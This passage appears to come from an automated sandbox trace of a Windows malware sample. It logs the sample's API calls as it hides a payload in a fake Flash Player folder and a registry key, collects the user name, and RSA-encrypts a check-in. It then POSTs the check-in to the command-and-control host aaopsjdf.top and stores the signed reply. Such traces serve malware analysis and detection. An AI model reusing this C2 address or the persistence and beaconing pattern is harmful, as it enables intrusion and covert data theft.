Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv甧ʆ霰\x0cʆ茶甧霰\x0c\x1c绻") returned 85 [0214.994] PathCombineW (in: pszDest=0xc9428, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" [0214.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286f3a4, cbMultiByte=85, lpWideCharStr=0x286f038, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rigʆ霰\x0cʆ茶甧霰\x0c\x1c绻") returned 85 [0214.994] PathCombineW (in: pszDest=0xc9748, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" [0214.994] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x286f454 | out: phkResult=0x286f454*=0x108) returned 0x0 [0214.994] RegQueryValueExW (in: hKey=0x108, lpValueName="Omegovna", lpReserved=0x0, lpType=0x286f480, lpData=0x0, lpcbData=0x286f468*=0x0 | out: lpType=0x286f480*=0x0, lpData=0x0, lpcbData=0x286f468*=0x0) returned 0x2 [0214.994] RegCloseKey (hKey=0x108) returned 0x0 [0214.994] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0214.994] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x286f458 | out: lpFileSize=0x286f458*=0) returned 1 [0214.994] CloseHandle (hObject=0x108) returned 1 [0214.995] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="4D") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="A3") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="8C") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="1F") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="12") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="D1") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="89") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="46") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="B1") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="7E") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="A3") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="A6") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="54") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="25") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="90") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286f278, cchDest=3, pszFmt="%02X", arglist=0x286f254 | out: pszDest="59") returned 2 [0214.995] CreateEventW (lpEventAttributes=0xc77e4, bManualReset=0, bInitialState=0, lpName="4DA38C1F12D18946B17EA3A654259059") returned 0x108 [0214.995] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0x0) returned 0x102 [0214.995] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="AB") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="C6") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="B5") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="B7") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="74") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="FF") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="9F") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="D7") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="F5") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="4E") returned 2 [0214.995] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="C2") returned 2 [0214.996] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="77") returned 2 [0214.996] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="09") returned 2 [0214.996] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="8C") returned 2 [0214.996] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="64") returned 2 [0214.996] wvnsprintfW (in: pszDest=0x286de10, cchDest=3, pszFmt="%02X", arglist=0x286ddec | out: pszDest="EE") returned 2 [0214.996] CreateMutexW (lpMutexAttributes=0xc77e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x10c [0214.996] WaitForSingleObject (hHandle=0x10c, dwMilliseconds=0xffffffff) returned 0x0 [0214.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286dd12, cbMultiByte=6, lpWideCharStr=0xc9b20, cchWideChar=10 | out: lpWideCharStr="Acuhci") returned 6 [0214.996] PathCombineW (in: pszDest=0xc9a68, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0214.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286dd30, cbMultiByte=9, lpWideCharStr=0xc9b20, cchWideChar=10 | out: lpWideCharStr="Baywkivyl") returned 9 [0214.996] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x286dd30 | out: phkResult=0x286dd30*=0x110) returned 0x0 [0214.996] RegQueryValueExW (in: hKey=0x110, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x286dd5c, lpData=0x0, lpcbData=0x286dd44*=0x0 | out: lpType=0x286dd5c*=0x0, lpData=0x0, lpcbData=0x286dd44*=0x0) returned 0x2 [0214.996] RegCloseKey (hKey=0x110) returned 0x0 [0214.996] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x286dff4 | out: phkResult=0x286dff4*=0x110) returned 0x0 [0214.996] RegQueryValueExW (in: hKey=0x110, lpValueName="Omegovna", lpReserved=0x0, lpType=0x286e020, lpData=0x0, lpcbData=0x286e008*=0x0 | out: lpType=0x286e020*=0x0, lpData=0x0, lpcbData=0x286e008*=0x0) returned 0x2 [0214.996] RegCloseKey (hKey=0x110) returned 0x0 [0214.996] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x110 [0214.996] GetFileSizeEx (in: hFile=0x110, lpFileSize=0x286dff8 | out: lpFileSize=0x286dff8*=0) returned 1 [0214.996] CloseHandle (hObject=0x110) returned 1 [0214.997] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x286dd44, lpdwDisposition=0x0 | out: phkResult=0x286dd44*=0x110, lpdwDisposition=0x0) returned 0x0 [0214.997] RegSetValueExW (in: hKey=0x110, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0xed0590*, cbData=0x6f0 | out: lpData=0xed0590*) returned 0x0 [0214.997] RegCloseKey (hKey=0x110) returned 0x0 [0214.997] ReleaseMutex (hMutex=0x10c) returned 1 [0214.997] CloseHandle (hObject=0x10c) returned 1 [0214.997] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x286e204 | out: phkResult=0x286e204*=0x10c) returned 0x0 [0214.997] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x286e230, lpData=0x0, lpcbData=0x286e218*=0x0 | out: lpType=0x286e230*=0x3, lpData=0x0, lpcbData=0x286e218*=0x6f0) returned 0x0 [0214.997] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x286e230, lpData=0xed0590, lpcbData=0x286e218*=0x6f0 | out: lpType=0x286e230*=0x3, lpData=0xed0590*, lpcbData=0x286e218*=0x6f0) returned 0x0 [0214.997] RegCloseKey (hKey=0x10c) returned 0x0 [0215.014] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x286eb98 | out: lpUrlComponents=0x286eb98) returned 1 [0215.727] GetSystemTime (in: lpSystemTime=0x286e848 | out: lpSystemTime=0x286e848*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x36, wSecond=0x3b, wMilliseconds=0x298)) [0215.727] SystemTimeToFileTime (in: lpSystemTime=0x286e848, lpFileTime=0x286e858 | out: lpFileTime=0x286e858) returned 1 [0215.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0215.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0xf4fef8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0215.728] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x286e8d0, nSize=0x286e87c | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x286e87c) returned 0x1 [0215.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0xf4ff88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YKYD69Q\\aETAdzjz", lpUsedDefaultChar=0x0) returned 16 [0215.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0215.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0xed05c0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DA064951B33C749DEEA4F9B0A440E075", lpUsedDefaultChar=0x0) returned 32 [0215.728] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x286e7cc | out: phkResult=0x286e7cc*=0x1bc) returned 0x0 [0215.728] RegQueryValueExW (in: hKey=0x1bc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x286e7f8, lpData=0x0, lpcbData=0x286e7e0*=0x0 | out: lpType=0x286e7f8*=0x0, lpData=0x0, lpcbData=0x286e7e0*=0x0) returned 0x2 [0215.728] RegCloseKey (hKey=0x1bc) returned 0x0 [0215.728] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0215.729] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x286e7d0 | out: lpFileSize=0x286e7d0*=0) returned 1 [0215.729] CloseHandle (hObject=0x1bc) returned 1 [0215.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xed0658, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0215.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xed0658, cbMultiByte=7, lpWideCharStr=0xed0670, cchWideChar=8 | out: lpWideCharStr="not set") returned 7 [0215.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="not set", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0215.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="not set", cchWideChar=7, lpMultiByteStr=0xed06c8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="not set", lpUsedDefaultChar=0x0) returned 7 [0215.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xed06c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0215.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xed06c8, cbMultiByte=8, lpWideCharStr=0xed0758, cchWideChar=9 | out: lpWideCharStr="%u.%u.%u") returned 8 [0215.729] wvnsprintfW (in: pszDest=0x286e884, cchDest=10, pszFmt="%u.%u.%u", arglist=0x286e85c | out: pszDest="2.6.1") returned 5 [0215.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0215.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0xed07b0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2.6.1", lpUsedDefaultChar=0x0) returned 5 [0215.730] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x286ea3e, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x286e7a0, pcbStructInfo=0x286e784 | out: pvStructInfo=0x286e7a0, pcbStructInfo=0x286e784) returned 1 [0215.734] CryptImportPublicKeyInfo (in: hCryptProv=0x5ce888, dwCertEncodingType=0x1, pInfo=0x5dbe90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x5dbec0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x5dbec8*, PublicKey.cUnusedBits=0x0), phKey=0x286e790 | out: phKey=0x286e790*=0x5dae50) returned 1 [0215.735] LocalFree (hMem=0x5dbe90) returned 0x0 [0215.735] wvnsprintfA (in: pszDest=0xedb9b0, cchDest=21, pszFmt="%d", arglist=0x286e6a4 | out: pszDest="1515610499") returned 10 [0215.736] CryptEncrypt (in: hKey=0x5dae50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x286e5f0*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x286e5f0*=0x100) returned 1 [0215.736] CryptEncrypt (in: hKey=0x5dae50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xedc4f8*, pdwDataLen=0x286e604*=0x20, dwBufLen=0x100 | out: pbData=0xedc4f8*, pdwDataLen=0x286e604*=0x100) returned 1 [0215.737] CryptDestroyKey (hKey=0x5dae50) returned 1 [0215.737] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x286e700 | out: lpUrlComponents=0x286e700) returned 1 [0215.737] wvnsprintfA (in: pszDest=0xedc250, cchDest=516, pszFmt="%s%s", arglist=0x286e738 | out: pszDest="https://aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw") returned 57 [0215.737] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x286e6f8 | out: lpUrlComponents=0x286e6f8) returned 1 [0215.738] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xca360, cbSize=0x286e72c | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", cbSize=0x286e72c) returned 0x0 [0215.755] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0215.757] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0xc4024, dwBufferLength=0x4) returned 1 [0215.757] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0xc402c, dwBufferLength=0x4) returned 1 [0215.757] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0xc4034, dwBufferLength=0x4) returned 1 [0215.757] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0215.758] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0xc4000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0216.098] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Connection: close\r\n,Ä", dwHeadersLength=0x13, lpOptional=0xf0c848, dwOptionalLength=0x2d8) returned 0 [0225.323] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x286e61c, lpdwBufferLength=0x286e620 | out: lpBuffer=0x286e61c, lpdwBufferLength=0x286e620) returned 1 [0225.323] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x286e61c, dwBufferLength=0x4) returned 1 [0225.323] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Connection: close\r\n,Ä", dwHeadersLength=0x13, lpOptional=0xf0c848*, dwOptionalLength=0x2d8 | out: lpOptional=0xf0c848*) returned 1 [0225.841] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x286e61c, lpdwBufferLength=0x286e620, lpdwIndex=0x0 | out: lpBuffer=0x286e61c*, lpdwBufferLength=0x286e620*=0x4, lpdwIndex=0x0) returned 1 [0225.841] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0225.842] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xf0d330, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x286e730 | out: lpBuffer=0xf0d330*, lpdwNumberOfBytesRead=0x286e730*=0x1000) returned 1 [0225.844] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0225.844] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xf0e330, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x286e730 | out: lpBuffer=0xf0e330*, lpdwNumberOfBytesRead=0x286e730*=0x698) returned 1 [0225.845] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0225.845] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xf0e9c8, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x286e730 | out: lpBuffer=0xf0e9c8*, lpdwNumberOfBytesRead=0x286e730*=0x0) returned 1 [0225.848] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0225.850] InternetQueryOptionA (in: hInternet=0xcc0008, dwOption=0x15, lpBuffer=0x286e72c, lpdwBufferLength=0x286e728 | out: lpBuffer=0x286e72c, lpdwBufferLength=0x286e728) returned 1 [0225.850] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0225.850] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0225.855] CryptImportKey (in: hProv=0x5ce888, pbData=0xf0c848, dwDataLen=0x120, hPubKey=0x0, dwFlags=0x0, phKey=0x286ebcc | out: phKey=0x286ebcc*=0x5dae90) returned 1 [0225.856] CryptCreateHash (in: hProv=0x5ce888, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x286ebc0 | out: phHash=0x286ebc0) returned 1 [0225.856] CryptHashData (hHash=0x5db450, pbData=0xf0f8c8, dwDataLen=0x6f0, dwFlags=0x0) returned 1 [0225.856] CryptVerifySignatureW (hHash=0x5db450, pbSignature=0xf0c848, dwSigLen=0x100, hPubKey=0x5dae90, szDescription=0x0, dwFlags=0x0) returned 1 [0225.857] CryptDestroyHash (hHash=0x5db450) returned 1 [0225.859] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x286eb9c, lpdwDisposition=0x0 | out: phkResult=0x286eb9c*=0x340, lpdwDisposition=0x0) returned 0x0 [0225.860] RegSetValueExW (in: hKey=0x340, lpValueName="Omegovna", Reserved=0x0, dwType=0x3, lpData=0xf0f8c8*, cbData=0x6f0 | out: lpData=0xf0f8c8*) returned 0x0 [0225.860] RegCloseKey (hKey=0x340) returned 0x0 [0225.860] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0225.860] WriteFile (in: hFile=0x340, lpBuffer=0xf0f8c8*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x286ebac, lpOverlapped=0x0 | out: lpBuffer=0xf0f8c8*, lpNumberOfBytesWritten=0x286ebac*=0x6f0, lpOverlapped=0x0) returned 1 [0225.862] CloseHandle (hObject=0x340) returned 1 [0225.863] GetCurrentThread () returned 0xfffffffe [0225.863] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x286eb84 | out: TokenHandle=0x286eb84*=0x0) returned 0 [0225.863] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x286eb84 | out: TokenHandle=0x286eb84*=0x340) returned 1 [0225.863] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x286eb78 | out: lpLuid=0x286eb78*(LowPart=0x8, HighPart=0)) returned 1 [0225.865] AdjustTokenPrivileges (in: TokenHandle=0x340, DisableAllPrivileges=0, NewState=0x286eb74*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0225.865] GetLastError () returned 0x514 [0225.865] CloseHandle (hObject=0x340) returned 1 [0225.865] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0225.866] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x657ae0, lpbSaclPresent=0x286eb9c, pSacl=0x286eba8, lpbSaclDefaulted=0x286eba0 | out: lpbSaclPresent=0x286eb9c, pSacl=0x286eba8, lpbSaclDefaulted=0x286eba0) returned 1 [0225.866] SetNamedSecurityInfoW () returned 0x0 [0225.867] LocalFree (hMem=0x657ae0) returned 0x0 [0225.867] GetNamedSecurityInfoW () returned 0x0 [0225.868] AllocateAndInitializeSid (in: pIdentifierAuthority=0x286eb68, nSubAuthorityCount=0x2, nSubAuthority0=0x2, nSubAuthority1=0x1, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x286eb78 | out: pSid=0x286eb78*=0x6548e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0xf), SubAuthority=([0]=0x2, [1]=0x0))) returned 1 [0225.868] SetEntriesInAclW () returned 0x0 [0225.868] SetNamedSecurityInfoW () returned 0x0 [0225.869] LocalFree 